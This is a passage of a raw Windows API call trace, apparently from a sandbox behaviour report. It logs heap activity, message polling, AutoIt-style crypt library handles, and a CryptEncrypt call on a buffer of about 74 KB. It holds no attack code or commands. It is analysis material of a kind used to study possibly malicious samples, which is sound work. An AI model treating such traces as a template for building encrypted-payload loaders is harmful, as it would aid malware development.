HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0237.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0237.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0237.260] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0237.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0237.260] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0237.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04690 [0237.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0237.260] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0237.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04690 | out: hHeap=0x970000) returned 1 [0237.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0237.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51208 [0237.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0237.261] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0237.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0237.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0237.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0237.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0237.261] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0237.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0237.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0237.261] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0237.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0237.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0237.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0237.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0237.261] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0237.261] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0237.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0237.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0237.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0237.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0237.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0237.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0237.262] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0237.262] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0237.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0237.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0237.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0237.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04070 [0237.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0237.262] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0237.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04070 | out: hHeap=0x970000) returned 1 [0237.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0237.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51118 [0237.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0237.262] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0237.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0237.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0237.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0237.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0237.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0237.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0237.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0237.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0237.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0237.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0237.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0237.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0237.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0237.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0237.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0237.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0237.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0237.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0237.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0237.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f350 [0237.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0237.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0237.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0237.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0237.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0237.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0237.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0237.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0237.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0237.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0237.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0237.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0237.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0237.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0237.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0237.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0237.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0237.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0237.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0237.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0237.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0237.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0237.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0237.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0237.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0237.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0237.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0237.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0237.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0237.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0237.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0237.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0237.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0237.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0237.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0237.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0237.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0237.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0237.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0237.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0237.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0237.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0237.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0237.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0237.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1245c) returned 0x2e80330 [0237.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0237.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0237.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0237.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0237.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0237.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0237.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0237.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0237.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0237.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0237.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56588 [0237.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0237.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0237.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0237.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0237.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0237.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0237.304] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0237.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0237.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0237.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0237.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0237.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0237.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0237.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0237.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0237.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0237.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0237.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0237.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0237.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0237.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0237.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0237.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0237.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0237.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0237.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0237.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e515b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0237.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0237.306] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0237.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0237.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0237.306] CryptEncrypt (in: hKey=0xa86f90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x1245c, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x12460) returned 1 [0237.306] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.306] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0237.306] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.306] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.306] CharLowerBuffW (in: lpsz="byte[74848]", cchLength=0xb | out: lpsz="byte[74848]") returned 0xb [0237.307] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.310] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.310] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0237.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0237.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0237.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511f0 [0237.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0237.310] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0237.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0237.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0237.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0237.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0237.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0237.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0237.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0237.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0237.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0237.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0237.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0237.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0237.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0237.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0237.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0237.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0237.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0237.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0237.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0237.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f350 [0237.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0237.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0237.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0237.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0237.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0237.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0237.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0237.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0237.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0237.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0237.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0237.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0237.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0237.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0237.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0237.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0237.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0237.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0237.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0237.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0237.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0237.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0237.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0237.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0237.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0237.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0237.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0237.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0237.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0237.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0237.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0237.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0237.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0237.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69888 [0237.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0237.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0237.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0237.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0237.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0237.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0237.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0237.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0237.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0237.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0237.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 